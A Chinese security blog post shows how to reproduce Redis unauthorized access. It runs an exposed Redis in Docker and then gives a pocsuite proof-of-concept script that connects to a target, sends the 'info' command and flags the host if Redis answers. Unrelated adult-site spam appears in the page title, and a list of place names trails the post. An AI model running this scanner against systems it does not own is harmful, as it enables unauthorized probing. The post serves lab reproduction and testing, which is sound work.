中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Redis未授權訪問docker復現

發布時間:2020-10-17 00:14:08 來源:網絡 閱讀:1204 作者:nw01f 欄目:安全技術
docker搜索Redis鏡像
docker search redis
拉去鏡像到本地
docker pull redis
查看下載好的鏡像
docker images
運行鏡像
docker run -p 6379:6379 -d redis

-p 將容器的6379端口映射到主機的6379端口。

-d 將容器后臺運行。

查看運行中的鏡像
docker ps
POC構成
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
from pocsuite.utils import register
from pocsuite.poc import Output, POCBase

class TestPOC(POCBase):
    vulID = '0'
    version = '1'
    author = 'nw01f'
    vulDate = '2018-10-23'
    createDate = '2018-10-23'
    updateDate = '2018-10-23'
    references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis Unauthorized'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized'
    desc = '''
            redis Unauthorized
    '''
    samples = ['']

    def _verify(self):
        result = {}
        payload = '\x69\x6e\x66\x6f\x0d\x0a'     ##   info/r/n
        s = socket.socket()
        socket.setdefaulttimeout(4)
        try:
            host = self.url.split(':')[1].strip('/')
            if len(self.url.split(':')) > 2:
                port = int(self.url.split(':')[2].strip('/'))
            else:
                port = 6379
            s.connect((host, port))
            s.send(payload)
            data = s.recv(1024)
            if data and 'redis_version' in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['url'] = self.url
                result['VerifyInfo']['port'] = port
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            print e
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("error")
        return output
register(TestPOC)
參考鏈接

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

昌江| 永城市| 建宁县| 怀宁县| 喀喇沁旗| 秦安县| 论坛| 宝鸡市| 时尚| 吴川市| 汾阳市| 德化县| 永和县| 新蔡县| 南开区| 鹿邑县| 班玛县| 巴林左旗| 应城市| 西乡县| 新河县| 宜章县| 志丹县| 南投市| 杭州市| 突泉县| 讷河市| 双辽市| 友谊县| 壶关县| 寻甸| 伊宁县| 南丹县| 拉孜县| 获嘉县| 奉化市| 扎鲁特旗| 什邡市| 无锡市| 白河县| 铜鼓县|